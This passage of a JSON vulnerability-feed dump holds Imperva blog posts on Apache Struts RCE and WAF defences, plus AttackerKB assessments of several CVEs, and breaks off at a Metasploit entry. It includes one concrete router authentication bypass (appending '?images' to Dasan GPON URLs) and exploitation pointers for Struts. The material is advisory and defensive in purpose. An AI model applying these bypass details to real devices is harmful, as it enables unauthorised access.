You might remember it reared its ugly head later in the year when it was tied to the Equifax breach. (We also wrote about two other Apache Struts vulnerabilities: [CVE-2017-9791](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>) and [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>).)\n\n## 3\\. Top Insider Threat Concern? Careless Users. [Survey]\n\nWe [surveyed 310 IT security professionals](<https://www.imperva.com/blog/2017/07/top-insider-threat-concern-careless-users-survey/>) at [Infosecurity Europe](<http://www.infosecurityeurope.com/>) in June on their thoughts on insider threats. The big reveal? More than half (59 percent) were concerned not primarily about malicious users, but about the careless ones who unwittingly put their organization\u2019s data at risk. (We shared more about insider threats in this [infographic](<https://www.imperva.com/blog/2017/05/thwart-insider-threats-with-machine-learning-infographic/>).)\n\n## 4\\. Uncover Sensitive Data with the Classifier Tool\n\nIn July we launched Classifier, a free data classification tool that allows organizations to quickly uncover sensitive data in their databases. The response was immediate\u2014over 500 [downloads ](<https://www.imperva.com/lg/lgw_trial.asp?pid=582>)and counting\u2014not surprising given it helps jump start the path to compliance with the GDPR. [Our blog post ](<https://www.imperva.com/blog/2017/07/uncover-sensitive-data-with-the-classifier-tool/>)walked through the steps of how to use the tool.\n\n## 5\\. Professional Services for GDPR Compliance\n\nSpeaking of the GDPR, the new data protection regulation coming out of the EU was on everyone's radar this year. We wrote a LOT about GDPR, including [who is subject to the regulation](<https://www.imperva.com/blog/2017/02/gdpr-series-part-1-gdpr-apply/>), [what rules require data protection technology](<https://www.imperva.com/blog/2017/03/gdpr-series-part-2-rules-require-data-protection-technology/?utm_source=socialmedia&utm_medium=organic_empshare&utm_campaign=2017_Q1_GDPRPart2>), and the [penalties for non-compliance.](<https://www.imperva.com/blog/2017/03/gdpr-series-part-4-penalties-non-compliance/>) However, our post on the [professional services we offer for GDPR compliance](<https://www.imperva.com/blog/2017/10/professional-services-for-gdpr-compliance/>) drove the most traffic on this topic by far.\n\n## 6\\. The Evolution of Cybercrime and What It Means for Data Security\n\nHackers tactics may change, but what they\u2019re after doesn\u2019t\u2014your data. Stealing or obstructing access to enterprise data is the foundation of the cybercrime value chain. We discussed how the [changing nature of cybercrime](<https://www.imperva.com/blog/2017/06/the-evolution-of-cybercrime-and-what-it-means-for-data-security/>) and app and data accessibility create risk and the essentials of application and data protection in this ever-changing world.\n\n## 7\\. Move Securely to the Cloud: WAF Requirements and Deployment Options\n\nMoving to the cloud has become an overwhelmingly popular trend even among those who were at first reluctant to make the move. In this post, we discussed [requirements and deployment options for evaluating a WAF for the cloud](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>). (We also wrote about the [benefits of a hybrid WAF deployment ](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>)and the pros and cons of both cloud and on-prem WAFs.)\n\n## 8\\. Clustering and Dimensionality Reduction: Understanding the \u201cMagic\u201d Behind Machine Learning\n\nEverywhere you turned in 2017 you heard about AI and machine learning and the impact they're having, or will have, on essentially everything. Two of Imperva's top cybersecurity researchers explained in detail [some of the techniques used in machine learning](<https://www.imperva.com/blog/2017/07/clustering-and-dimensionality-reduction-understanding-the-magic-behind-machine-learning/>) and how they're applied to solve for identifying improper access to unstructured data. (Those two researchers were also awarded a patent for their machine learning work this year!)\n\n## 9\\. Can a License Solve Your Cloud Migration Problem?\n\nGartner published their [2017 Magic Quadrant for Web Application Firewalls ](<https://www.imperva.com/blog/2017/08/gartner-magic-quadrant-for-wafs-a-leader-four-consecutive-years/>)(WAF) in August and Imperva was once again named a WAF leader, making it four consecutive years. We stood out for offering security solutions for today's changing deployment and infrastructure model. [In this post](<https://www.imperva.com/blog/2017/11/license-solve-cloud-migration-problem/>) we wrote about our flexible licensing program, which lies at the core of the move to the cloud: helping customers secure apps wherever they need, whenever they need, for one price.\n\n## 10\\. The Uber Breach and the Case for Data Masking\n\nLast but not least, we couldn't ignore the Uber breach. Hard to believe in today's world that log in credentials were shared in a public, unsecured forum, but that's what happened. The breach did highlight an important issue, that of production data being used in development environments. It's a bad idea; [we explained why in this post](<https://www.imperva.com/blog/2017/11/uber-breach-case-data-masking/>). Had data masking been used at Uber, hackers would have been left with worthless data, or as we called it, digital fools gold.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-12-18T17:43:16", "type": "impervablog", "title": "Imperva\u2019s Top 10 Blogs of 2017", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805"], "modified": "2017-12-18T17:43:16", "id": "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "href": "https://www.imperva.com/blog/2017/12/impervas-top-10-blogs-of-2017/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-21T16:39:07", "description": "People used to argue about whether cyber security is a business problem or a technical problem. But this frames the issue poorly. \u201cProblem\u201d and \u201csolution\u201d imply that there is a definitive \u201csolve.\u201d\n\nCybercrime isn\u2019t a technical problem that can be definitively solved. It is an inherent business risk of having something of value. And risk can\u2019t be solved. Risk can only be managed.\n\nThe thing that differentiates cyber security from almost any other IT discipline (disaster recovery and business continuity in a post 9/11 world is another) is that with cyber security there is an adversary, and that adversary is motivated and incented to beat you. And if you have something of value to them, and if their reward outweighs their risk, they will continually evolve their tactics to get to it.\n\nBusiness-driven digital transformation is driving exponential growth in the number of knowledge workers, websites, mobile apps, APIs, file servers, databases, etc. Each of these enable our businesses to collect, generate and/or use data to competitive advantage.\n\nIn security parlance, this is known as \u201csurface area\u201d; that which is exposed to an attacker. Each is either an end target of the cybercriminal, or a vector a cybercriminal uses to get to data. The more our businesses digitize, the more surface area there will be. Most of this surface area (the big exception is people themselves) is manifested as technology.\n\n## What\u2019s this got to do with Apache Struts?\n\n[Apache Struts](<http://struts.apache.org/>) \u2013 and you\u2019d have to work hard to find something that initially seems more disconnected from business risk as Apache Struts \u2013 illustrates this.\n\nApache Struts is a framework that extends the Java Servlet API for writing web/mobile/API-based applications. Digital transformation means more apps. More apps mean more use of frameworks like Struts. Which means more technical surface area exposed to attackers. This illustrates why \u201cjust reduce surface area\u201d alone isn\u2019t a strategy. Less surface area means less apps, which would mean less digital transformation itself. Given the perceived cost and revenue-side business benefits of digital transformation, this is not likely to happen.\n\nStruts, and other similar frameworks, basically enable developers to write Java apps faster. Struts has been around, in one form or another, since 2000. The current framework \u2013 [Apache Struts 2](<https://en.wikipedia.org/wiki/Apache_Struts_2>) \u2013 was initially released in 2007. Some estimate it is used by 65 percent of the Fortune 500.\n\nOur [research team](<https://www.imperva.com/DefenseCenter>) \u2013 which is the same team that releases our WAF signatures/virtual patches for known vulnerabilities \u2013 collected the following stats on Struts:\n\n * 75 published security vulnerabilities to date\n * 83% of the vulnerabilities can be accessed via a remote attacker (i.e., via network)\n * 75% of the vulnerabilities have working exploits\n * 35% of the vulnerabilities may allow remote code execution (RCE) attacks\n\n### What is RCE?\n\n[RCE](<https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>) is nasty. IMHO, nastier than the more famous/infamous application vulnerability [SQL injection](<https://www.imperva.com/app-security/threatglossary/sql-injection/>). RCE, or remote code execution, allows an attacker to replace the parameters normally submitted as part of an API call with malicious code. Crafted carefully, this malicious code will then execute on the server. What this malicious code does is up to the attacker. Given that web apps frequently access back-end data stores, the potential for a RCE vulnerability to be exploited to breach data is apparent.\n\nIn 2017, there have been four different Apache Struts RCE vulnerabilities:\n\n * CVE-2017-12611\n * [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>)\n * [CVE-2017-9791](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>)\n * [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>)\n\nA close look at these shows several strategies for both reactively and proactively protecting application surface area. These certainly apply to Apache Struts, but also to most application frameworks.\n\n## Ways to Protect Application Surface Area\n\n### Patch Servers\n\nThe long-term fix for a vulnerability is to patch the servers. However, rolling out a patch across thousands of servers running hundreds of different apps owned by tens of different app teams is a not a trivial task. It can take months. Which is why most servers aren\u2019t at current patch levels.\n\nThere is another bit of nastiness around patching as well. Sometimes patches aren\u2019t backwards compatible. [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) contains this: _\u201cIt is possible that some REST actions stop working because of applied default restrictions on available classes.\u201d _In layman\u2019s terms, this means applying the patch can break an existing app. This gets to the heart of why security is risk management: deciding to apply a patch prior to testing a patch with all apps runs the risk of breaking the apps (a.k.a., \u201cpotentially bringing down a website\u201d).\n\n### Virtual Patching\n\nA virtual patch uses a gateway (WAF, IDS, network firewall) that monitors traffic to identify and block an attack before it reaches a web server. _Note, not all types of security gateways can apply a virtual patch to all types of vulnerabilities. _\n\nFor Struts CVE-2017-9805, Imperva used the [ThreatRadar](<https://www.imperva.com/Products/ThreatRadarSubscriptions>) Emergency Feed to distribute a signature and a corresponding virtual patch to SecureSphere Web Application Firewall users within 48 hours of the CVE\u2019s disclosure. Emergency Feed is an opt-in service that leverages the communication channel between SecureSphere and the Imperva cloud to automatically distribute signatures and associated policies to mitigate highly critical vulnerabilities. This in effect automatically deploys a virtual patch for the vulnerability. A policy accomplishing the same thing was uploaded to Incapsula in the same timeframe, accomplishing the same thing for any Incapsula WAF customers.\n\nVirtual patches for known CVEs are useful, but they are reactive. They are predicated upon knowing about a vulnerability in the first place. There is no (despite what some may say) general signature that spans all RCEs. The following are proactive defenses that can be used to protect against application vulnerabilities (RCE and otherwise).\n\n### Reputation-based Blocking\n\nThe vast majority of attacks launched against web app frameworks are automated. For example, for [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>), 40% of the attacks tracked by our research team originated from a single server in China. There is no reason for any traffic from any source like this to be reaching web servers. Imperva ThreatRadar IP Reputation can be set to fetch the latest IP Reputation feeds several times an hour. While this won\u2019t catch every instance of an attack, it is an excellent filter that will proactively block a large portion of the automated attacks that target web apps.\n\n### Anti-automation\n\nIP reputation isn\u2019t the only mechanism for stopping automated attacks. Both SecureSphere and Incapsula provide functionality for identifying and blocking bots, regardless of the bot\u2019s intent. Both use the same underlying technology to progressively profile a request to determine if the request is a human or a bot, and if a bot a good bot or a bad bot. Identifying and blocking requests from bad bots is another technique for scrubbing automated attacks targeting web apps.\n\n### Web Application Firewall Zero Day Protections\n\nReputation and anti-automation are extremely effective at filtering automated attacks from bad actors, but a careful attacker will be able to mask itself, especially when focusing upon a specific app or enterprise.\n\nHowever, to exploit an RCE vulnerability in every case the attacker needs to send the malicious code \u2013 the \u201cpayload\u201d \u2013 to the app in question. This payload will look wildly different from the typical content (e.g., an API call) submitted to an app. By learning what payloads are normally submitted via various form submissions and API calls, a solid WAF can prevent something like CVE-2017-9805 without knowing the vulnerability exists, and without ever seeing the payload before. The SecureSphere WAF uses machine learning to understand how an application normally behaves, and then uses it to identify and block anomalous requests.\n\nImperva zero day protections identified Apache Struts exploits almost immediately via a few different mechanisms:\n\n * Upon learning of a vulnerability, attackers will frequently \u201cspray and pray\u201d an attack against numerous apps, and various forms/APIs within an app. Given automation, its more cost effective for them to just broadly launch an attack than it is first determine if an app/API is even vulnerable. We saw this for CVE-2017-9805 almost immediately, identifying it a \u201cunknown content type for known URL\u201d. In English, this translates to \u201cnot only is this not normal, it isn\u2019t even content that this URL can process.\u201d These kinds of alerts are an early \u201ctell\u201d that something is afoot, and our research team uses them as both an early indicator, as well as to inform our ThreatRadar threat intelligence feeds.\n * If the app is susceptible to the vulnerability, a malicious payload will still not conform to normal application traffic. In the case of CVE-2017-9805, SecureSphere will identify an \u201cunknown parameter\u201d or \u201cparameter type violation.\u201d\n * In most cases, the payload is much larger/longer than a normal request. In these cases, a \u201cparameter length violation\u201d will surface.\n\n## The Role of App Security Domain Expertise\n\nWhat only someone who lives and breathes this stuff on a day-in/day-out basis knows is that any one of these violations by themselves isn\u2019t necessarily an attack. Policies built on evaluating any of this in isolation can result in a high rate of false positives. False positives are the bane of IT security\u2019s existence, _because when looking at a screen full of alerts, you don\u2019t know which ones are false and which aren\u2019t. _The net effect is ignoring them all.\n\nSecureSphere WAF has [patented capabilities](<https://www.imperva.com/Products/AdvancedTechnologies>) that evaluate the relationships between multiple violations. This ability to analyze seemingly independent violations coming from different layers of the app stack (e.g., network protocol, parameter length, IP reputation, etc.) together greatly enhances accuracy. This not only minimizes false positives, but more importantly provides the confidence to actually _block_ requests.\n\n## Manage Business Risk, Protect Against App Exploits\n\nAccording to the [2017 Verizon Data Breach Investigation Report](<http://www.verizonenterprise.com/verizon-insights-lab/dbir/2017/>) more successful breaches resulted from attacks on web apps than any other type of attack. This is telling since web app attacks are only number four in terms of incident frequency.\n\nAttackers realize that web app frameworks like Struts (and all frameworks have security issues) are particularly attractive targets. Since they are used for public facing web apps, they can\u2019t be hidden behind layers of network security. Their role is to accept inputs (web form parameters, API calls, etc.) and then process these inputs, which directly maps to particularly dangerous exploits like SQL injection and RCE. Since frameworks are widely adopted, attackers automate their attacks so they can cost effectively leverage their effort across thousands of websites.\n\nBusiness will roll out more application functionality. The cost savings and revenue generating opportunities from digital transformation pretty much guarantee we\u2019ll have more app surface area next year than this year. Learn more about how to use these capabilities to protect this ever growing surface area with Imperva SecureSphere [Web Application Firewall (WAF)](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>) and [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-09-18T20:33:25", "type": "impervablog", "title": "Apache Struts, RCE and Managing App Risk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805"], "modified": "2017-09-18T20:33:25", "id": "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "href": "https://www.imperva.com/blog/2017/09/apache-struts-rce-and-managing-app-risk/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-23T17:31:04", "description": "On August 22, Apache Struts released a [security patch](<http://struts.apache.org/announce.html#a20180822-1>) fixing a critical remote code execution vulnerability. This vulnerability has been assigned CVE-2018-11776 (S2-057) and affects Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16. \n\nThe vulnerability was responsibly disclosed by Man Yue Mo from the Semmle Security Research team, check out a detailed description [here](<https://lgtm.com/blog/apache_struts_CVE-2018-11776>). An [exploit PoC ](<https://github.com/jas502n/St2-057/blob/master/README.md>)has already been published. \n\n[Imperva WAF](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>) customers are protected out of the box against this vulnerability, no need for any special configuration on the customer end.", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-23T14:25:36", "type": "impervablog", "title": "Read: Apache Struts Patches \u2018Critical Vulnerability\u2019 CVE-2018-11776", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-23T14:25:36", "id": "IMPERVABLOG:E9D83907E76B2B468512918F211FB65E", "href": "https://www.imperva.com/blog/2018/08/read-apache-struts-patches-critical-vulnerability-cve-2018-11776/", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2023-10-18T16:44:49", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:30pm UTC reported:\n\nUnlike [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>), which was exploitable out of the box, since it targeted Struts\u2019 Jakarta multipart parser, this vulnerability requires a certain set of circumstances to be true in order for Struts to be exploitable. Since Struts is a web application framework, this will depend entirely on the application the developers have created.\n\n**I don\u2019t know how common this particular scenario is.** Please read the [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-059>) for more information. However, what I do know is that this CVE falls somewhere after [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>) and [CVE-2018-11776](<https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776>) on the exploitability scale, from most exploitable to least: a parser flaw, a configuration flaw, and a programming flaw.\n\nSo, definitely patch this, but also follow Struts development best practices, including those outlined in their security bulletins. No measure of mitigations will protect you from poorly written code.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T00:00:00", "type": "attackerkb", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776", "CVE-2019-0230"], "modified": "2023-10-07T00:00:00", "id": "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "href": "https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:41:53", "description": "An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \u201c?images\u201d to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-04T00:00:00", "type": "attackerkb", "title": "CVE-2018-10561", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10561"], "modified": "2023-10-06T00:00:00", "id": "AKB:A8B25CF8-4C17-4A7A-A4F2-C89EC89A8205", "href": "https://attackerkb.com/topics/RHsDGDlxs7/cve-2018-10561", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T11:32:52", "description": "HP Operations Manager 8.10 on Windows contains a \u201chidden account\u201d in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2009-11-24T00:00:00", "type": "attackerkb", "title": "CVE-2009-3843", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3843"], "modified": "2023-10-04T00:00:00", "id": "AKB:7AD2ABEF-642C-4C50-B84F-BB1FCBC66D8B", "href": "https://attackerkb.com/topics/JXxzdmi7fH/cve-2009-3843", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T08:14:25", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).\n\n \n**Recent assessments:** \n \n**wchen-r7** at May 23, 2019 5:44pm UTC reported:\n\nStraight forward and reliable exploitation. No auth required. WebLogic is quite well known and it is also bundled in other products. Should be a pentester\u2019s favorite.\n\n**asoto-r7** at September 12, 2019 6:06pm UTC reported:\n\nStraight forward and reliable exploitation. No auth required. WebLogic is quite well known and it is also bundled in other products. Should be a pentester\u2019s favorite.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-19T00:00:00", "type": "attackerkb", "title": "CVE-2017-10271 - Oracle WebLogic Server AsyncResponseService Deserialization Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2023-10-05T00:00:00", "id": "AKB:7992242A-E0F4-4572-BE13-859467611F09", "href": "https://attackerkb.com/topics/KjHcjsGuez/cve-2017-10271---oracle-weblogic-server-asyncresponseservice-deserialization-vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-10-18T16:41:57", "description": "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn\u2019t have value and action set and in same time, its upper package have no or wildcard namespace.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at April 14, 2020 6:33pm UTC reported:\n\nThis vulnerability exists within the Apache Struts OGNL method dispatch routine. An attacker can submit a specially crafted HTTP request to a vulnerable web server. Specifically an attacker can taint the `name` parameter passed to [`OgnlUtil::getValue()`](<https://lgtm.com/projects/g/apache/struts/snapshot/02518d8149ff0b60863b4012cd3268cf0f2942b7/files/core/src/main/java/com/opensymphony/xwork2/ognl/OgnlUtil.java?sort=name&dir=ASC&mode=heatmap#L301>).\n\nExploitation of this vulnerability would lead to code execution within the context of the Java process powering the server. An indicator of compromise will be present in the logs at the `DEBUG` level. This IOC will look like a malformed value in the `Executing action method =` message.\n\nThe default configuration is not vulnerable. The `alwaysSelectFullNamespace` option must be enabled. This can be done by adding `<constant name=\"struts.mapper.alwaysSelectFullNamespace\" value=\"true\" />` to the `struts.xml` configuration file.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-22T00:00:00", "type": "attackerkb", "title": "CVE-2018-11776", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-10-06T00:00:00", "id": "AKB:4AA28DD7-15C7-4892-96A3-0190EA268037", "href": "https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-01-02T12:11:37", "description": "This module exploits a vulnerability found in ManageEngine Desktop Central 9. When uploading a 